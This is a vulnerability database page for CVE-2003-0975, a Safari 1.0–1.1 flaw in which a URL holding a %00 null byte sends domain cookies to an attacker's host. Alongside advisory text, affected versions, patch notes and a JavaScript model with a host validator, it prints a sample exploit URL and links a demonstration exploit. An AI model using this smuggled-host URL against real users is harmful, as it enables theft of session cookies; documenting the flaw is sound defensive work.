CVE-2003-0975
CVSS 5.0
Published: 2003-12-15 00:00:00
Last modified: 2016-10-17 22:38:41

[Original] Apple Safari 1.0 through 1.1 on Mac OS X 10.3.1 and Mac OS X 10.2.8 allows remote attackers to steal user cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain.


[CNNVD] Apple Safari Web Browser Null Character Cookie Theft Vulnerability (CNNVD-200312-021)

        
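        Apple Safari is a web browser for Apple systems.
        Apple Safari mishandles malicious URLs. A remote attacker can exploit this flaw by constructing a malicious URL and enticing a user to visit it, stealing sensitive cookie information.
        If Apple Safari loads and parses the following URL:
         http://alive.znep.com%00www.passport.com/cgi-bin/cookies
        it connects to the host before the "%00" but sends cookies to the server based on the entire host name. The issue can be used to steal cookies set for a specific path; by using the specific path and SSL in the request URL, cookies set with the secure flag can also be stolen. However, cookies set for a specific host name (such as "www.passport.com") cannot be stolen this way; only cookies set for the entire domain are affected.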
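
The host mismatch described above, as an added JavaScript example that is not part of the original advisory and is not Safari's code: `flawedHosts` models the split between the host that is contacted and the host used for cookie selection (treating the decoded NUL as the cut point is an assumption of this model), and `isValidHost` is a strict host check that refuses such a URL. All function names are hypothetical.

```javascript
// Added example (not Safari's code): a model of the behaviour described above.
// All function names are hypothetical.

// Raw host from an http(s) URL: no decoding, userinfo and port dropped.
function rawHost(url) {
  const m = /^https?:\/\/([^\/?#]*)/i.exec(url);
  if (!m) throw new Error("not an http(s) URL");
  return m[1].replace(/^.*@/, "").replace(/:\d*$/, "");
}

// Model of the flaw (assumption): the connection uses the text before the
// decoded NUL, while cookie selection sees the whole decoded host name.
function flawedHosts(url) {
  const decoded = decodeURIComponent(rawHost(url));
  return { connectHost: decoded.split("\0")[0], cookieHost: decoded };
}

// Cookie matching: a domain cookie (".passport.com") matches by suffix,
// a host-only cookie ("www.passport.com") needs the exact host name.
function cookieMatches(cookieScope, host) {
  host = host.toLowerCase();
  return cookieScope.startsWith(".")
    ? host.endsWith(cookieScope) || host === cookieScope.slice(1)
    : host === cookieScope;
}

// Strict check: only dot-separated letter/digit/hyphen labels form a host.
// Percent-escapes (so "%00"), control characters and empty labels are refused.
function isValidHost(host) {
  if (host.length === 0 || host.length > 253) return false;
  return host.split(".").every(
    (label) => /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$/i.test(label)
  );
}

// URL taken from the advisory text.
const SAMPLE = "http://alive.znep.com%00www.passport.com/cgi-bin/cookies";
```

In the model, the sample URL connects to `alive.znep.com` while a `.passport.com` domain cookie still matches and a host-only `www.passport.com` cookie does not; `isValidHost(rawHost(SAMPLE))` rejects the URL before either step.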
        

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:apple:safari:1.1  Apple Safari 1.1
cpe:/o:apple:mac_os_x:10.2.8  Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x_server:10.2.8  Apple Mac OS X Server 10.2.8
cpe:/a:apple:safari:1.0  Apple Safari 1.0
cpe:/o:apple:mac_os_x_server:10.3.1  Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.3.1  Apple Mac OS X 10.3.1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0975
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0975
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-021
(Official data source) CNNVD

- Other Links and Resources

http://docs.info.apple.com/article.html?artnum=61798
(VENDOR_ADVISORY)  CONFIRM  http://docs.info.apple.com/article.html?artnum=61798
http://lists.apple.com/mhonarc/security-announce/msg00042.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00042.html
http://marc.info/?l=bugtraq&m=106917674428552&w=2
(UNKNOWN)  BUGTRAQ  20031118 Apple Safari 1.1 (v100)
http://xforce.iss.net/xforce/xfdb/7973
(UNKNOWN)  XF  mozilla-netscape-steal-cookies(7973)

- Vulnerability Information

Apple Safari Web Browser Null Character Cookie Theft Vulnerability
Medium severity  Input validation
2003-12-15 00:00:00 2006-06-15 00:00:00
Remote
        
        

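- Advisories and Patches

        Vendor patch:
        Apple
        -----
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
        
        http://www.apple.com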

- Vulnerability Information

2860
Apple Safari Null Character Cookie Theft

- Vulnerability Description

Apple Safari has a flaw which may permit an attacker to steal cookies set for domains (as opposed to hosts), even if set with the 'secure flag' and using SSL. The flaw occurs during the handling of NULL (%00) characters in URLs.

- Timeline

2003-11-25 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released patches to address this vulnerability.

- Related References

- Credit

Unknown or Incomplete

- Vulnerability Information

Apple Safari Web Browser Null Character Cookie Stealing Vulnerability
Input Validation Error 9065
Yes No
2003-11-18 12:00:00 2009-07-12 12:56:00
This vulnerability was discovered by Austin Gilbert <austin@breakingrobots.net>.

- Affected Program Versions

Apple Safari 1.1
Apple Safari 1.0
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X 10.2.6
+ Apple Mac OS X 10.2.6
+ Apple Mac OS X 10.2.5
+ Apple Mac OS X 10.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.2
+ Apple Mac OS X Server 10.2.8
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.3.1
Apple Mac OS X 10.2.8

- Discussion

An issue has been discovered in Apple Safari, which may allow an attacker to steal cookie-based authentication credentials from a user of a vulnerable web browser. The problem is in the handling of NULL (%00) characters in URLs.

This issue may only be exploited to steal cookies set for a domain, as opposed to cookies set for a specific host in that domain. Cookies set with the secure flag can be stolen if the attacker uses SSL.

- Exploit

A demonstration exploit was made available when the issues described in BID 3925 were initially released. This demo is said to still work on affected Apple Safari releases and can be found at the following link:

http://alive.znep.com/~marcs/security/mozillacookie/cookies-redirect.cgi

- Solution

Apple has released an advisory (APPLE-SA-2003-12-05) and fixes to address this issue. Please see referenced advisory for further details. Fixes are linked below.

Apple has released a Security Update to address this vulnerability:


Apple Safari 1.0

Apple Safari 1.1

Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X 10.3.1

Apple Mac OS X Server 10.3.1

- Related References

 

 
